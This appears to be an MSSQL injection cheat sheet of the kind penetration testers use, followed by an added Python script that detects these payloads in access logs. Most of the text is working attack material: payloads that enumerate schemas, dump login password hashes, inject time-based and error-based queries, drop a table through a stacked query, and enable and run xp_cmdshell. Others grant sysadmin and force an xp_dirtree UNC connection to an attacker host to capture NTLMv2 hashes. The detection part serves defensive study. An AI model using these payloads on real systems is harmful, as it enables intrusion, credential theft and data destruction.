MSSQL Injection

Summary

MSSQL comments

  -- comment goes here
  /* comment goes here */

MSSQL version

  SELECT @@version

MSSQL database name

  SELECT DB_NAME()

MSSQL List databases

  SELECT name FROM master..sysdatabases;
  SELECT DB_NAME(N); -- for N = 0, 1, 2, ...

MSSQL List columns

  SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only
  SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable
  SELECT table_catalog, column_name FROM information_schema.columns

MSSQL List tables

  SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
  SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
  SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable
  SELECT table_catalog, table_name FROM information_schema.columns

MSSQL Extract user/password

  -- MSSQL 2000:
  SELECT name, password FROM master..sysxlogins
  SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- need to convert to hex to return hashes in an MSSQL error message / some versions of Query Analyzer
  -- MSSQL 2005:
  SELECT name, password_hash FROM master.sys.sql_logins
  SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) FROM master.sys.sql_logins

MSSQL Union Based

  -- extract database names
  $ SELECT name FROM master..sysdatabases
  [*] Injection
  [*] msdb
  [*] tempdb
  -- extract tables from the Injection database
  $ SELECT name FROM Injection..sysobjects WHERE xtype = 'U'
  [*] Profiles
  [*] Roles
  [*] Users
  -- extract columns for the table Users
  $ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')
  [*] UserId
  [*] UserName
  -- finally extract the data
  $ SELECT UserId, UserName FROM Users

MSSQL Error based

  For integer inputs : convert(int,@@version)
  For integer inputs : cast((SELECT @@version) as int)
  For string inputs  : ' + convert(int,@@version) + '
  For string inputs  : ' + cast((SELECT @@version) as int) + '

MSSQL Blind based

  SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
  WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) AS row, * FROM log_table)
  SELECT message FROM data WHERE row = 1 AND message LIKE 't%'

MSSQL Time based

  ProductID=1;waitfor delay '0:0:10'--
  ProductID=1);waitfor delay '0:0:10'--
  ProductID=1';waitfor delay '0:0:10'--
  ProductID=1');waitfor delay '0:0:10'--
  ProductID=1));waitfor delay '0:0:10'--
  IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: --

MSSQL Stacked Query

Use a semicolon ";" to append another query:

  ProductID=1; DROP members--

MSSQL Command execution

  EXEC xp_cmdshell 'net user';
  EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
  EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';

If you need to re-enable xp_cmdshell (disabled by default since SQL Server 2005):

  EXEC sp_configure 'show advanced options',1;
  RECONFIGURE;
  EXEC sp_configure 'xp_cmdshell',1;
  RECONFIGURE;

To interact with the MSSQL instance:

  sqsh -S 192.168.1.X -U sa -P superPassword
  python mssqlclient.py WORKGROUP/Administrator:password@192.168.1.X -port 46758

MSSQL UNC Path

MSSQL supports stacked queries, so we can create a variable pointing to our IP address and then use the xp_dirtree stored procedure to list the files in our SMB share and capture the NTLMv2 hash.

  1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';--

MSSQL Make user DBA (DB admin)

  EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin';
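The payload families above (time-based WAITFOR DELAY, stacked queries, xp_cmdshell and its re-enabling via sp_configure, xp_dirtree with a UNC path, sp_addsrvrolemember, error-based convert/cast) leave recognisable traces in web-server access logs. The detector below is an added example, not part of the original cheat sheet: it URL-decodes each request's query string and reports which of this page's indicators it matches. The log format, IP addresses and sample requests are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# (name, regex) pairs derived from the payload families listed on this page;
# each regex is applied to the URL-decoded query string of one request.
SIGNATURES = [
    ("time_based_waitfor", re.compile(r"waitfor\s+delay\s+'\d+:\d+:\d+'", re.I)),
    ("stacked_query", re.compile(r";\s*(drop|exec|use|declare|waitfor)\b", re.I)),
    ("xp_cmdshell", re.compile(r"\bxp_cmdshell\b", re.I)),
    ("xp_cmdshell_reenable", re.compile(r"sp_configure\s*'xp_cmdshell'\s*,\s*1", re.I)),
    ("unc_path_xp_dirtree", re.compile(r"xp_dirtree\s*'\\\\", re.I)),
    ("error_based_convert", re.compile(r"\b(convert|cast)\s*\(\s*(int|\(?select)", re.I)),
    ("sysadmin_grant", re.compile(r"sp_addsrvrolemember\b.*sysadmin", re.I)),
]

# Constructed access-log lines (common-log-like format, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /product.asp?ProductID=1 HTTP/1.1" 200
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /product.asp?ProductID=1';waitfor+delay+'0:0:10'-- HTTP/1.1" 200
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /product.asp?ProductID=1;EXEC+sp_configure+'xp_cmdshell',1;RECONFIGURE;-- HTTP/1.1" 500
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /product.asp?ProductID=1';exec+xp_dirtree+'%5C%5C10.10.15.99%5CSHARE';-- HTTP/1.1" 500
10.0.0.6 - - [01/Jan/2024:10:00:05 +0000] "GET /search.asp?q=waitfor+the+delay HTTP/1.1" 200
"""

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

def decode_query(url: str) -> str:
    """Return the URL-decoded query string ('' if none); '+' becomes a space."""
    _path, _, query = url.partition("?")
    return unquote_plus(query)

def scan_line(line: str) -> list[str]:
    """Return the names of the signatures matched by one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = decode_query(m.group(1))
    return [name for name, rx in SIGNATURES if rx.search(query)]

def scan_log(text: str) -> dict[int, list[str]]:
    """Map 1-based line number to matched signature names, for lines that hit."""
    hits = {}
    for n, line in enumerate(text.splitlines(), 1):
        names = scan_line(line)
        if names:
            hits[n] = names
    return hits

if __name__ == "__main__":
    for n, names in scan_log(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(names)}")
```

The last sample line ("waitfor the delay" in a search box) is included to show that the signatures key on the T-SQL structure, not on isolated keywords.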
